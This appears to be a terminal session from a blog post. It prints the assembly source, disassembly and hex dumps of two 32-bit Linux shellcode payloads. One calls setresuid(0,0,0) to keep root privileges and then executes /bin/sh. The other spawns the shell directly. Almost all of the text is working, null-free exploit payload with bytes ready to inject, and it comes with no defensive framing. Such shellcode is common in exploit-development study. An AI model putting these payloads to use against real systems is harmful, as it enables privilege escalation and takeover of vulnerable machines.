$ cat priv_shell.s
BITS 32
global _start

_start:
;setresuid(uid_t ruid, uid_t euid, uid_t suid)
xor ebx, ebx  ; root ruid = 0
xor ecx, ecx  ; root euid = 0
xor edx, edx ; root suid = 0
xor eax, eax
mov al, 0xa4 ; setresuid call number = 0xa4(164)
int 0x80

;int execve(const char * filename, char * const argv[], char * const envp[])
; execve("/bin//sh", ["/bin//sh", 0x0], [ 0x0 ]);

xor eax, eax  ; eax = 0
push eax
push '//sh'
push '/bin'   ; "/bin//sh", 0x0

mov ebx, esp  ; const char * filename = "/bin//sh", 0x0
push eax
mov edx, esp  ; char * const envp[] = [ 0 ]
push ebx
mov ecx, esp  ; char * const argv[] = [ "/bin//sh", 0 ]
mov al, 11
int 0x80


$ xxd priv_shell
0000000: 31db 31c9 31d2 31c0 b0a4 cd80 31c0 5068  1.1.1.1.....1.Ph
0000010: 2f2f 7368 682f 6269 6e89 e350 89e2 5389  //shh/bin..P..S.
0000020: e1b0 0bcd 80                             .....

$ cat tiny_shell.s
BITS 32
global _start

_start:
;int execve(const char * filename, char * const argv[], char * const envp[])
; execve("/bin//sh", ["/bin//sh", 0x0], [ 0x0 ]);

xor eax, eax  ; eax = 0
push eax
push '//sh'
push '/bin'   ; "/bin//sh", 0x0

mov ebx, esp  ; const char * filename = "/bin//sh", 0x0
push eax
mov edx, esp  ; char * const envp[] = [ 0 ]
push ebx
mov ecx, esp  ; char * const argv[] = [ "/bin//sh", 0 ]
mov al, 11
int 0x80

$ ndisasm -B32 tiny_shell
00000000  31C0              xor eax,eax
00000002  50                push eax
00000003  682F2F7368        push dword 0x68732f2f
00000008  682F62696E        push dword 0x6e69622f
0000000D  89E3              mov ebx,esp
0000000F  50                push eax
00000010  89E2              mov edx,esp
00000012  53                push ebx
00000013  89E1              mov ecx,esp
00000015  B00B              mov al,0xb
00000017  CD80              int 0x80

$ xxd tiny_shell
0000000: 31c0 5068 2f2f 7368 682f 6269 6e89 e350  1.Ph//shh/bin..P
0000010: 89e2 5389 e1b0 0bcd 80                   ..S......


+ Recent posts